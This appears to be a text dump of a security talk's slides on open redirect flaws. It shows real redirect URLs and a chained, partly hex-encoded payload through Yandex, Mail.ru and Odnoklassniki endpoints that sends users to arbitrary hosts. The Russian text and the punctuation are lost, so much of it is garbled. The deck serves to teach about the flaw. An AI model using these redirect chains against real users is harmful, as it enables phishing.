Title: Open Redirects
1?? ???? ????? ??????????
2about me
- anonimous_at_localhost whoami
- BigBear
- anonimous_at_localhost id
- uid1020(pentest) gid100(antichat)
groups101(rdot) - _at_i_BigBear
3Open Redirects
- OWASP Description
- An open redirect is an application that takes a
parameter and redirects a user to the parameter
value without any validation. - This vulnerability is used in phishing attacks to
get users to visit malicious sites without
realizing it.
4Open Redirects
5Open Redirects
6Open Redirects
Client
Server 1
1.php?redirhttp//server2
header("Location http//server2/")
Server 2
7Open Redirects
Client
Server 1
1.php?redirhttp//anyhost
header("Location http//anyhost/")
Server 2
8Open Redirects
9Open Redirects
_at_Black2Fan
10Open Redirects
Client
Server 1
1.php?redirhttp//server2
header("Location http//server2/")
Server 2
any host
header("Location http//anyhost/")
11Open Redirects
http//yandex.ru/clck/jsredir?fromyandex.ru3Byan
dsearch3Bweb3B3Btextetext635.A3K9EhGzrzdN
http//yabs.yandex.ru/count/RhnEbYFY6Pm4000 http
//awaps.yandex.net/1/c1/tx21lszVf7wve-k2Rifa_A_.sw
fclick_num0 http//an.yandex.ru/count/asfa3573v
svsTTvssb9dYYe
12Open Redirects
13Open Redirects
https//mail.yandex.ru/ ?retpathhttps//mail.yand
ex.ru/neo2/inbox
https//mail.yandex.ru/ ?retpathhttps//google.co
m
14Open Redirects
https//mail.yandex.ru/ ?retpathhttps//an.yandex
.ru/count/JcnAPGOmkJy40000Zh_yYqi5XPvP5vK1cm5kGxS2
98Yuvo_10OczVX8D0fYihxs-dWQThty64fQpheHU0Rhm6mcCwD
vLyGMc6ugmgHN00Rs_yYMp0Qe1fQc4nmEyg9iX0v6rhcBQ1u
15Open Redirects
Why ???
16Open Redirects
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp//deti.mail.ru/
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// google.com/
17Open Redirects
?????????????? -)
Step 1 ???? ?????????
Step 2 ???? ????????? ?? ???
18Open Redirects
?????????????? -)
http//ok.ru/dk?cmdlogExternalst.cmdlogExternal
st.name62670701063111st.linkhttp//www.yandex.
ru/
19Open Redirects
?????????????? -)
http//odnoklassniki.mail.ru
Step 3 ?????????
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp//odnoklassniki.mail.ru/
20Open Redirects
?pagehttp//odnoklassniki3Fmany-many-params
auth.mail.ru
Client
header("Location http//odnoklassniki3Fmany-many
-params/")
Odnoklassniki.ru
any host
header("Location http//anyhost/")
21Open Redirects
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// odnoklassniki.mail.ru/dk?cmd
logExternalst.cmdlogExternalst.name62670701063
111 st. linkhttp//www.yandex.ru/
22Open Redirects
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// odnoklassniki.mail.ru/dk?cmd
logExternalst.cmdlogExternalst.name62670701063
111st.linkhttp//anyhost/
23Open Redirects
24Open Redirects
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// odnoklassniki.mail.ru/dk?cmd
logExternalst.cmdlogExternalst.name62670701063
111 st. linkhttp//www.yandex.ru/
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// odnoklassniki.mail.ru/dk?cmd
logExternalst.cmdlogExternalst.name62670701063
111 st. linkhttp//any.yandex.ru/
25Open Redirects
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// odnoklassniki.mail.ru/dk?cmd
logExternalst.cmdlogExternalst.name62670701063
111st. linkhttp// an.yandex.ru/count/JcnAPGOmkJ
y40000Zh_yYqi5XPvP5vK1cm5kGxS298Yuvo_10OczVX8D0fYi
hxs-dWQThty64fQpheHU0Rhm6mcCwDvLyGMc6ugmgHN00Rs_yY
Mp0Qe1fQc4nmEyg9iX0v6rhcBQ1u--x8jD1v-uiY4R3fE539bY
GeoGdoIWaDGmhv2V9AUEcQYmG5bp1wJ00000J0MkyUW8iyWCm0
m5iB2-9f03iG6oYbEvhty64hl-rfaBeJVud071__________yF
VnO0
26Open Redirects
https//auth.mail.ru/cgi-bin/auth?FakeAuthPagePa
gehttp// odnoklassniki.mail.ru/dk?cmd
logExternalst.cmdlogExternalst.name62670701063
111st. linkhttp // an.yandex.ru2f636f756e
742f4a636e4150474f6d6b7957436d306d
356942322d396630336947366f5962457
66874793634686c2d72666142654a5675
643037315f5f5f5f5f5f5f5f5f5f794656
6e4f30
27Open Redirects
?????????????? -)
Client
odnoklassniki.mail.ru
auth.mail.ru
ok.ru
an.yandex.ru
anyhost
28??????? ?? ???????? ! _at_i_BigBear